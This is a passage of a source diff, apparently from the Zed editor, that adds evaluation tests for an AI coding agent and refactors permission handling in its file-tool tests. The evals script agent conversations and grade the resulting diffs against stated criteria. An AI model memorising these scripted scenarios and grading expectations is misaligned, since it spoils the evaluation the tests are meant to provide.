wasi-sdk-25.0-x86_64-macos.tar.gz + - wasi-sdk-25.0-arm64-macos.tar.gz + - wasi-sdk-25.0-x86_64-linux.tar.gz + - wasi-sdk-25.0-arm64-linux.tar.gz + - wasi-sdk-25.0-x86_64-linux.tar.gz + - wasi-sdk-25.0-arm64-linux.tar.gz + - wasi-sdk-25.0-x86_64-windows.tar.gz + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(971), + end_line: Some(1050), + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + lines(input_file_content, 971..1050), + )], + ), + message( + Assistant, + [tool_use( + "tool_2", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(1050), + end_line: Some(1100), + }, + )], + ), + message( + User, + [tool_result( + "tool_2", + ReadFileTool::NAME, + lines(input_file_content, 1050..1100), + )], + ), + message( + Assistant, + [tool_use( + "tool_3", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(1100), + end_line: Some(1150), + }, + )], + ), + message( + User, + [tool_result( + "tool_3", + ReadFileTool::NAME, + lines(input_file_content, 1100..1150), + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff(indoc::indoc! {" + - The compile_parser_to_wasm method has been changed to use wasi-sdk + - ureq is used to download the SDK for current platform and architecture + "}), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_disable_cursor_blinking() { + let input_file_path = "root/editor.rs"; + let input_file_content = include_str!("fixtures/disable_cursor_blinking/before.rs"); + let possible_diffs = vec![ + include_str!("fixtures/disable_cursor_blinking/possible-01.diff"), + include_str!("fixtures/disable_cursor_blinking/possible-02.diff"), + include_str!("fixtures/disable_cursor_blinking/possible-03.diff"), + include_str!("fixtures/disable_cursor_blinking/possible-04.diff"), + ]; + + eval_utils::eval(100, 0.51, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message(User, [text("Let's research how to cursor blinking works.")]), + message( + Assistant, + [tool_use( + "tool_1", + GrepTool::NAME, + GrepToolInput { + regex: "blink".into(), + include_pattern: None, + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + GrepTool::NAME, + [ + lines(input_file_content, 100..400), + lines(input_file_content, 800..1300), + lines(input_file_content, 1600..2000), + lines(input_file_content, 5000..5500), + lines(input_file_content, 8000..9000), + lines(input_file_content, 18455..18470), + lines(input_file_content, 20000..20500), + lines(input_file_content, 21000..21300), + ] + .join("Match found:\n\n"), + )], + ), + message( + User, + [text(indoc::indoc! {" + Comment out the lines that interact with the BlinkManager. + Keep the outer `update` blocks, but comments everything that's inside (including if statements). + Don't add additional comments. + "})], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::assert_diff_any(possible_diffs.clone()), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_from_pixels_constructor() { + let input_file_path = "root/canvas.rs"; + let input_file_content = include_str!("fixtures/from_pixels_constructor/before.rs"); + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::indoc! {" + Introduce a new `from_pixels` constructor in Canvas and + also add tests for it in the same file. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + message( + Assistant, + [tool_use( + "tool_2", + GrepTool::NAME, + GrepToolInput { + regex: "mod\\s+tests".into(), + include_pattern: Some("font-kit/src/canvas.rs".into()), + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result("tool_2", GrepTool::NAME, "No matches found")], + ), + message( + Assistant, + [tool_use( + "tool_3", + GrepTool::NAME, + GrepToolInput { + regex: "mod\\s+tests".into(), + include_pattern: Some("font-kit/src/**/*.rs".into()), + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result("tool_3", GrepTool::NAME, "No matches found")], + ), + message( + Assistant, + [tool_use( + "tool_4", + GrepTool::NAME, + GrepToolInput { + regex: "#\\[test\\]".into(), + include_pattern: Some("font-kit/src/**/*.rs".into()), + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result( + "tool_4", + GrepTool::NAME, + indoc::indoc! {" + Found 6 matches: + + ## Matches in font-kit/src/loaders/core_text.rs + + ### mod test › L926-936 + ``` + mod test { + use super::Font; + use crate::properties::{Stretch, Weight}; + + #[cfg(feature = \"source\")] + use crate::source::SystemSource; + + static TEST_FONT_POSTSCRIPT_NAME: &'static str = \"ArialMT\"; + + #[cfg(feature = \"source\")] + #[test] + ``` + + 55 lines remaining in ancestor node. Read the file to see all. + + ### mod test › L947-951 + ``` + } + + #[test] + fn test_core_text_to_css_font_weight() { + // Exact matches + ``` + + ### mod test › L959-963 + ``` + } + + #[test] + fn test_core_text_to_css_font_stretch() { + // Exact matches + ``` + + ## Matches in font-kit/src/loaders/freetype.rs + + ### mod test › L1238-1248 + ``` + mod test { + use crate::loaders::freetype::Font; + + static PCF_FONT_PATH: &str = \"resources/tests/times-roman-pcf/timR12.pcf\"; + static PCF_FONT_POSTSCRIPT_NAME: &str = \"Times-Roman\"; + + #[test] + fn get_pcf_postscript_name() { + let font = Font::from_path(PCF_FONT_PATH, 0).unwrap(); + assert_eq!(font.postscript_name().unwrap(), PCF_FONT_POSTSCRIPT_NAME); + } + ``` + + 1 lines remaining in ancestor node. Read the file to see all. + + ## Matches in font-kit/src/sources/core_text.rs + + ### mod test › L265-275 + ``` + mod test { + use crate::properties::{Stretch, Weight}; + + #[test] + fn test_css_to_core_text_font_weight() { + // Exact matches + assert_eq!(super::css_to_core_text_font_weight(Weight(100.0)), -0.7); + assert_eq!(super::css_to_core_text_font_weight(Weight(400.0)), 0.0); + assert_eq!(super::css_to_core_text_font_weight(Weight(700.0)), 0.4); + assert_eq!(super::css_to_core_text_font_weight(Weight(900.0)), 0.8); + + ``` + + 27 lines remaining in ancestor node. Read the file to see all. + + ### mod test › L278-282 + ``` + } + + #[test] + fn test_css_to_core_text_font_stretch() { + // Exact matches + ``` + "}, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff(indoc::indoc! {" + - The diff contains a new `from_pixels` constructor + - The diff contains new tests for the `from_pixels` constructor + "}), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_zode() { + let input_file_path = "root/zode.py"; + let input_content = None; + + eval_utils::eval(50, 1., eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message(User, [text(include_str!("fixtures/zode/prompt.md"))]), + message( + Assistant, + [ + tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: "root/eval/react.py".into(), + start_line: None, + end_line: None, + }, + ), + tool_use( + "tool_2", + ReadFileTool::NAME, + ReadFileToolInput { + path: "root/eval/react_test.py".into(), + start_line: None, + end_line: None, + }, + ), + ], + ), + message( + User, + [ + tool_result( + "tool_1", + ReadFileTool::NAME, + include_str!("fixtures/zode/react.py"), + ), + tool_result( + "tool_2", + ReadFileTool::NAME, + include_str!("fixtures/zode/react_test.py"), + ), + ], + ), + ], + input_file_path, + input_content.clone(), + EvalAssertion::new(async move |sample, _, _cx| { + let invalid_starts = [' ', '`', '\n']; + let mut message = String::new(); + for start in invalid_starts { + if sample.text_after.starts_with(start) { + message.push_str(&format!("The sample starts with a {:?}\n", start)); + break; + } + } + message.pop(); + + if message.is_empty() { + Ok(EvalAssertionOutcome { + score: 100, + message: None, + }) + } else { + Ok(EvalAssertionOutcome { + score: 0, + message: Some(message), + }) + } + }), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_add_overwrite_test() { + let input_file_path = "root/action_log.rs"; + let input_file_content = include_str!("fixtures/add_overwrite_test/before.rs"); + + eval_utils::eval(200, 0.5, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::indoc! {" + Introduce a new test in `action_log.rs` to test overwriting a file. + That is, a file already exists, but we call `buffer_created` as if the file were new. + Take inspiration from all the other tests in the file. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + indoc::indoc! {" + pub struct ActionLog [L13-20] + tracked_buffers [L15] + edited_since_project_diagnostics_check [L17] + project [L19] + impl ActionLog [L22-498] + pub fn new [L24-30] + pub fn project [L32-34] + pub fn checked_project_diagnostics [L37-39] + pub fn has_edited_files_since_project_diagnostics_check [L42-44] + fn track_buffer_internal [L46-101] + fn handle_buffer_event [L103-116] + fn handle_buffer_edited [L118-123] + fn handle_buffer_file_changed [L125-158] + async fn maintain_diff [L160-264] + pub fn buffer_read [L267-269] + pub fn buffer_created [L272-276] + pub fn buffer_edited [L279-287] + pub fn will_delete_buffer [L289-304] + pub fn keep_edits_in_range [L306-364] + pub fn reject_edits_in_ranges [L366-459] + pub fn keep_all_edits [L461-473] + pub fn changed_buffers [L476-482] + pub fn stale_buffers [L485-497] + fn apply_non_conflicting_edits [L500-561] + fn diff_snapshots [L563-585] + fn point_to_row_edit [L587-614] + enum ChangeAuthor [L617-620] + User [L618] + Agent [L619] + enum TrackedBufferStatus [L623-627] + Created [L624] + Modified [L625] + Deleted [L626] + struct TrackedBuffer [L629-641] + buffer [L630] + base_text [L631] + unreviewed_changes [L632] + status [L633] + version [L634] + diff [L635] + snapshot [L636] + diff_update [L637] + _open_lsp_handle [L638] + _maintain_diff [L639] + _subscription [L640] + impl TrackedBuffer [L643-657] + fn has_changes [L644-650] + fn schedule_diff_update [L652-656] + pub struct ChangedBuffer [L659-661] + pub diff [L660] + mod tests [L664-1574] + fn init_logger [L678-682] + fn init_test [L684-691] + async fn test_keep_edits [L694-769] + async fn test_deletions [L772-854] + async fn test_overlapping_user_edits [L857-951] + async fn test_creating_files [L954-1010] + async fn test_deleting_files [L1013-1120] + async fn test_reject_edits [L1123-1255] + async fn test_reject_multiple_edits [L1258-1331] + async fn test_reject_deleted_file [L1334-1388] + async fn test_reject_created_file [L1391-1443] + async fn test_random_diffs [L1446-1535] + fn quiesce [L1510-1534] + struct HunkStatus [L1538-1542] + range [L1539] + diff_status [L1540] + old_text [L1541] + fn unreviewed_hunks [L1544-1573] + + Showing symbols 1-69 (total symbols: 69) + + Using the line numbers in this outline, you can call this tool again while specifying + the start_line and end_line fields to see the implementations of symbols in the outline. + "}, + )], + ), + message( + Assistant, + [ + text( + "Let's look at the existing test cases that are related to file creation to understand the pattern:", + ), + tool_use( + "tool_2", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(953), + end_line: Some(1010), + }, + ), + ], + ), + message( + User, + [tool_result( + "tool_2", + ReadFileTool::NAME, + lines(input_file_content, 953..1010), + )], + ), + message( + Assistant, + [ + text( + "Now let's look at another relevant test to understand how they're structured:", + ), + tool_use( + "tool_3", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(1012), + end_line: Some(1120), + }, + ), + ], + ), + message( + User, + [tool_result( + "tool_3", + ReadFileTool::NAME, + lines(input_file_content, 1012..1120), + )], + ), + message( + Assistant, + [ + text("Now let's look at how `buffer_created` is implemented:"), + tool_use( + "tool_4", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(271), + end_line: Some(276), + }, + ), + ], + ), + message( + User, + [tool_result( + "tool_4", + ReadFileTool::NAME, + lines(input_file_content, 271..276), + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff( + "A new test for overwritten files was created, without changing any previous test", + ), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_create_empty_file() { + let input_file_path = "root/TODO3"; + let input_file_content = None; + let expected_output_content = String::new(); + + eval_utils::eval(100, 0.99, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message(User, [text("Create a second empty todo file ")]), + message( + Assistant, + [ + text(indoc::formatdoc! {" + I'll help you create a second empty todo file. + First, let me examine the project structure to see if there's already a todo file, which will help me determine the appropriate name and location for the second one. + "}), + tool_use( + "toolu_01GAF8TtsgpjKxCr8fgQLDgR", + ListDirectoryTool::NAME, + ListDirectoryToolInput { + path: "root".to_string(), + }, + ), + ], + ), + message( + User, + [tool_result( + "toolu_01GAF8TtsgpjKxCr8fgQLDgR", + ListDirectoryTool::NAME, + "root/TODO\nroot/TODO2\nroot/new.txt\n", + )], + ), + ], + input_file_path, + input_file_content.clone(), + EvalAssertion::assert_eq(expected_output_content.clone()), + )) + }); +} diff --git a/crates/agent/src/tools/list_directory_tool.rs b/crates/agent/src/tools/list_directory_tool.rs index 1a674aaa71fef5bf9c11688e82982a5dbcfee331..c88492bba40ee4fdfa928f153e49a302ad60be8b 100644 --- a/crates/agent/src/tools/list_directory_tool.rs +++ b/crates/agent/src/tools/list_directory_tool.rs @@ -848,7 +848,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -979,13 +982,11 @@ mod tests { "Expected private path validation error, got: {error}" ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested when validation fails before listing", ); @@ -1027,13 +1028,11 @@ mod tests { "Normal path should succeed without authorization" ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested for normal paths", ); @@ -1084,13 +1083,11 @@ mod tests { "Intra-project symlink should succeed without authorization: {result:?}", ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested for intra-project symlinks", ); diff --git a/crates/agent/src/tools/move_path_tool.rs b/crates/agent/src/tools/move_path_tool.rs index c246b3c5b0661546f4617bb5521766f9da3839fb..eaea204d84d96ab841f2e075a42a1a42b827374d 100644 --- a/crates/agent/src/tools/move_path_tool.rs +++ b/crates/agent/src/tools/move_path_tool.rs @@ -273,7 +273,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -379,13 +382,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -451,8 +457,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/read_file_tool.rs b/crates/agent/src/tools/read_file_tool.rs index bbc67cf68c7d104772c18ad222478621ce4d7a54..0086a82f4e79c9924502202873ceb2b25d2e66fb 100644 --- a/crates/agent/src/tools/read_file_tool.rs +++ b/crates/agent/src/tools/read_file_tool.rs @@ -2,7 +2,7 @@ use action_log::ActionLog; use agent_client_protocol::{self as acp, ToolCallUpdateFields}; use anyhow::{Context as _, Result, anyhow}; use futures::FutureExt as _; -use gpui::{App, Entity, SharedString, Task, WeakEntity}; +use gpui::{App, Entity, SharedString, Task}; use indoc::formatdoc; use language::Point; use language_model::{LanguageModelImage, LanguageModelToolResultContent}; @@ -21,7 +21,7 @@ use super::tool_permissions::{ ResolvedProjectPath, authorize_symlink_access, canonicalize_worktree_roots, resolve_project_path, }; -use crate::{AgentTool, Thread, ToolCallEventStream, ToolInput, outline}; +use crate::{AgentTool, ToolCallEventStream, ToolInput, outline}; /// Reads the content of the given file in the project. /// @@ -56,21 +56,21 @@ pub struct ReadFileToolInput { } pub struct ReadFileTool { - thread: WeakEntity, project: Entity, action_log: Entity, + update_agent_location: bool, } impl ReadFileTool { pub fn new( - thread: WeakEntity, project: Entity, action_log: Entity, + update_agent_location: bool, ) -> Self { Self { - thread, project, action_log, + update_agent_location, } } } @@ -119,7 +119,6 @@ impl AgentTool for ReadFileTool { cx: &mut App, ) -> Task> { let project = self.project.clone(); - let thread = self.thread.clone(); let action_log = self.action_log.clone(); cx.spawn(async move |cx| { let input = input @@ -212,7 +211,6 @@ impl AgentTool for ReadFileTool { }); if is_image { - let image_entity: Entity = cx .update(|cx| { self.project.update(cx, |project, cx| { @@ -258,17 +256,6 @@ impl AgentTool for ReadFileTool { return Err(tool_content_err(format!("{file_path} not found"))); } - // Record the file read time and mtime - if let Some(mtime) = buffer.read_with(cx, |buffer, _| { - buffer.file().and_then(|file| file.disk_state().mtime()) - }) { - thread - .update(cx, |thread, _| { - thread.file_read_times.insert(abs_path.to_path_buf(), mtime); - }) - .ok(); - } - let mut anchor = None; // Check if specific line ranges are provided @@ -328,15 +315,17 @@ impl AgentTool for ReadFileTool { }; project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: anchor.unwrap_or_else(|| { - text::Anchor::min_for_buffer(buffer.read(cx).remote_id()) + if self.update_agent_location { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: anchor.unwrap_or_else(|| { + text::Anchor::min_for_buffer(buffer.read(cx).remote_id()) + }), }), - }), - cx, - ); + cx, + ); + } if let Ok(LanguageModelToolResultContent::Text(text)) = &result { let text: &str = text; let markdown = MarkdownCodeBlock { @@ -358,13 +347,10 @@ impl AgentTool for ReadFileTool { #[cfg(test)] mod test { use super::*; - use crate::{ContextServerRegistry, Templates, Thread}; use agent_client_protocol as acp; use fs::Fs as _; use gpui::{AppContext, TestAppContext, UpdateGlobal as _}; - use language_model::fake_provider::FakeLanguageModel; use project::{FakeFs, Project}; - use prompt_store::ProjectContext; use serde_json::json; use settings::SettingsStore; use std::path::PathBuf; @@ -379,20 +365,7 @@ mod test { fs.insert_tree(path!("/root"), json!({})).await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let (event_stream, _) = ToolCallEventStream::test(); let result = cx @@ -425,20 +398,7 @@ mod test { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let result = cx .update(|cx| { let input = ReadFileToolInput { @@ -472,20 +432,7 @@ mod test { let language_registry = project.read_with(cx, |project, _| project.languages().clone()); language_registry.add(language::rust_lang()); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let result = cx .update(|cx| { let input = ReadFileToolInput { @@ -565,20 +512,7 @@ mod test { let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let result = cx .update(|cx| { let input = ReadFileToolInput { @@ -610,20 +544,7 @@ mod test { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); // start_line of 0 should be treated as 1 let result = cx @@ -753,20 +674,7 @@ mod test { let project = Project::test(fs.clone(), [path!("/project_root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); // Reading a file outside the project worktree should fail let result = cx @@ -961,20 +869,7 @@ mod test { let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let read_task = cx.update(|cx| { @@ -1001,7 +896,10 @@ mod test { ); authorization .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = read_task.await; @@ -1080,24 +978,7 @@ mod test { .await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log.clone(), - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log.clone(), true)); // Test reading allowed files in worktree1 let result = cx @@ -1284,24 +1165,7 @@ mod test { cx.executor().run_until_parked(); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let task = cx.update(|cx| { @@ -1324,7 +1188,10 @@ mod test { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -1360,24 +1227,7 @@ mod test { cx.executor().run_until_parked(); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let task = cx.update(|cx| { @@ -1440,24 +1290,7 @@ mod test { cx.executor().run_until_parked(); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let result = cx @@ -1484,13 +1317,11 @@ mod test { "Expected private-files validation error, got: {error}" ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested when validation fails before read", ); diff --git a/crates/agent/src/tools/restore_file_from_disk_tool.rs b/crates/agent/src/tools/restore_file_from_disk_tool.rs index c1aa8690a840ea6911dcb94c26c8cef3cb5f313d..b808a966cf983c92a5e93c19599ff5333ed70860 100644 --- a/crates/agent/src/tools/restore_file_from_disk_tool.rs +++ b/crates/agent/src/tools/restore_file_from_disk_tool.rs @@ -523,7 +523,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -586,8 +589,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -651,13 +654,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); diff --git a/crates/agent/src/tools/save_file_tool.rs b/crates/agent/src/tools/save_file_tool.rs index 99e937b9dff2a1b4781dde16bd2bf6d64edd25ad..0cf9666a415f8174e9036ebadf8368589294c885 100644 --- a/crates/agent/src/tools/save_file_tool.rs +++ b/crates/agent/src/tools/save_file_tool.rs @@ -518,7 +518,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -581,8 +584,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -646,13 +649,16 @@ mod 